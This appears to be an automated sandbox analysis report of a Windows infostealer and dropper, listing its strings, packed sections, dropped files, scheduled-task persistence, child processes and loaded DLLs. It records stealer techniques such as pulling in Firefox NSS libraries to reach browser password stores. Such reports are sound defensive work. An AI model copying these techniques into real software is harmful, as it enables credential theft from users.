Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 1jPL5zru3u.exe, 00000000.00000003.1803657208.00000000293A0000.00000004.00000020.00020000.00000000.sdmp, DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 1jPL5zru3u.exe, 00000000.00000003.1803657208.00000000293A0000.00000004.00000020.00020000.00000000.sdmp, DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: .idata
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C3EED10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C42B700
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C42B8C0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C42B910
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C3CF280
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C35A0 0_2_6C3C35A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43545C 0_2_6C43545C
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43AC00 0_2_6C43AC00
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C405C10 0_2_6C405C10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C412C10 0_2_6C412C10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43542B 0_2_6C43542B
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D5440 0_2_6C3D5440
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C406CF0 0_2_6C406CF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D6C80 0_2_6C3D6C80
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CD4E0 0_2_6C3CD4E0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4234A0 0_2_6C4234A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42C4A0 0_2_6C42C4A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3ED4D0 0_2_6C3ED4D0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D64C0 0_2_6C3D64C0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F0512 0_2_6C3F0512
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EED10 0_2_6C3EED10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DFD00 0_2_6C3DFD00
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C400DD0 0_2_6C400DD0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4285F0 0_2_6C4285F0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C412E4E 0_2_6C412E4E
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C403E50 0_2_6C403E50
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C436E63 0_2_6C436E63
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C415600 0_2_6C415600
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CC670 0_2_6C3CC670
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C407E10 0_2_6C407E10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E9E50 0_2_6C3E9E50
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C429E30 0_2_6C429E30
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E4640 0_2_6C3E4640
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4376E3 0_2_6C4376E3
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E5E90 0_2_6C3E5E90
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42E680 0_2_6C42E680
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CBEF0 0_2_6C3CBEF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DFEF0 0_2_6C3DFEF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C424EA0 0_2_6C424EA0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D9F00 0_2_6C3D9F00
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C407710 0_2_6C407710
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F6FF0 0_2_6C3F6FF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CDFE0 0_2_6C3CDFE0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4177A0 0_2_6C4177A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D7810 0_2_6C3D7810
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40F070 0_2_6C40F070
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40B820 0_2_6C40B820
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C414820 0_2_6C414820
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E8850 0_2_6C3E8850
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3ED850 0_2_6C3ED850
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4350C7 0_2_6C4350C7
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F60A0 0_2_6C3F60A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4058E0 0_2_6C4058E0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EC0E0 0_2_6C3EC0E0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C41B970 0_2_6C41B970
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43B170 0_2_6C43B170
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DD960 0_2_6C3DD960
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EA940 0_2_6C3EA940
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FD9B0 0_2_6C3FD9B0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CC9A0 0_2_6C3CC9A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C405190 0_2_6C405190
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C422990 0_2_6C422990
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C409A60 0_2_6C409A60
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C408AC0 0_2_6C408AC0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DCAB0 0_2_6C3DCAB0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C22A0 0_2_6C3C22A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F4AA0 0_2_6C3F4AA0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40E2F0 0_2_6C40E2F0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E1AF0 0_2_6C3E1AF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43BA90 0_2_6C43BA90
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C432AB0 0_2_6C432AB0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DC370 0_2_6C3DC370
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40D320 0_2_6C40D320
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C5340 0_2_6C3C5340
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4353C8 0_2_6C4353C8
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CF380 0_2_6C3CF380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BA4CD0 10_2_00BA4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE3048 10_2_00BE3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BD7D63 10_2_00BD7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE6EE9 10_2_00BE6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BA4AD0 10_2_00BA4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE763B 10_2_00BE763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE2BB0 10_2_00BE2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE8700 10_2_00BE8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE775B 10_2_00BE775B
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: String function: 6C4094D0 appears 90 times
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: String function: 6C3FCBE8 appears 134 times
Source: 1jPL5zru3u.exe, 00000000.00000002.1889398481.000000006C452000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1jPL5zru3u.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCm1 vs 1jPL5zru3u.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1889717651.000000006C645000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1jPL5zru3u.exe
Source: 1jPL5zru3u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1jPL5zru3u.exe Static PE information: Section: ZLIB complexity 0.9994759908536586
Source: 1jPL5zru3u.exe Static PE information: Section: ZLIB complexity 0.9935302734375
Source: 1jPL5zru3u.exe Static PE information: Section: ZLIB complexity 0.9891357421875
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9983723958333334
Source: amadka[1].exe.0.dr Static PE information: Section: ltpqnbtv ZLIB complexity 0.9945090835345608
Source: CAEHDBAAEC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983723958333334
Source: CAEHDBAAEC.exe.0.dr Static PE information: Section: ltpqnbtv ZLIB complexity 0.9945090835345608
Source: explorti.exe.6.dr Static PE information: Section: ZLIB complexity 0.9983723958333334
Source: explorti.exe.6.dr Static PE information: Section: ltpqnbtv ZLIB complexity 0.9945090835345608
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/27@0/3
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C427030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C427030
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 1jPL5zru3u.exe, 00000000.00000003.1726152515.00000000230B4000.00000004.00000020.00020000.00000000.sdmp, DGDBKFBAKFBFHIECFBFI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: CAEHDBAAEC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 1jPL5zru3u.exe String found in binary or memory: uy/AdD
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File read: C:\Users\user\Desktop\1jPL5zru3u.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1jPL5zru3u.exe "C:\Users\user\Desktop\1jPL5zru3u.exe"
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHJKKECFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe"
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe" Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHJKKECFIE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: appresolver.dll
